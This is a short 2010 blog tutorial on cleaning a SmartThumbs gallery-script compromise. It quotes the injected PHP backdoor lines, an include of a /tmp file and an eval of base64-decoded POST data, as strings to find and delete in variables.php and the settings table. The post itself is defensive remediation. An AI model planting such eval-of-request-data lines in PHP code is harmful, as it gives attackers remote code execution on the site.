Remove SmartThumbs exploit in 5 steps
Posted by MMagery on Saturday May 8, 2010Many webmsters have recently (until last update) noticed rouge sites after clicking on their TGPs and MGPs. Cause was ST exploit and vulnerability in ST that was fixed in last update. However you HAVE TO be sure that your ST is clean. So here is quick tutorial. If you need help with cleaning you can hire system administrator from DLXER.com
1. step - UPDATE your ST to lastest version!
2. step - open st/admin/variables.php file and search for strings @eval(base64_decode($_POST or $qall=1;@include_once in case you find them your ST install is still infected. You have to remove lines:
$qall=1;@include_once(’/tmp/sesa.tmp’);
@eval(base64_decode($_POST [qxp]));//’;
ST variables.php exploit strings
3. step - remove file /tmp/sesa.tmp (command: rm -f /tmp/sesa.tmp) for future protection you can setup 3 min cronjob which will clean all *.tmp files in /tmp/ folder
4. step - cleaning mysql database - first you have to find which mysql database your ST install is using, data is in st/classes/mysql.php after that use phpmyadmin tool and login to your mysql database. Find table st_settings then column niche. You will notice same exploit strings here. You have to remove them.
5. step - lock down your ST install run command php st/admin/lock.php
update: just got update that /tmp/webcam.tmp could be filename for include statement too, so if you have anything like @include_once(’/tmp/XXXXXX.tmp’); in your variables.php file your ST is infected
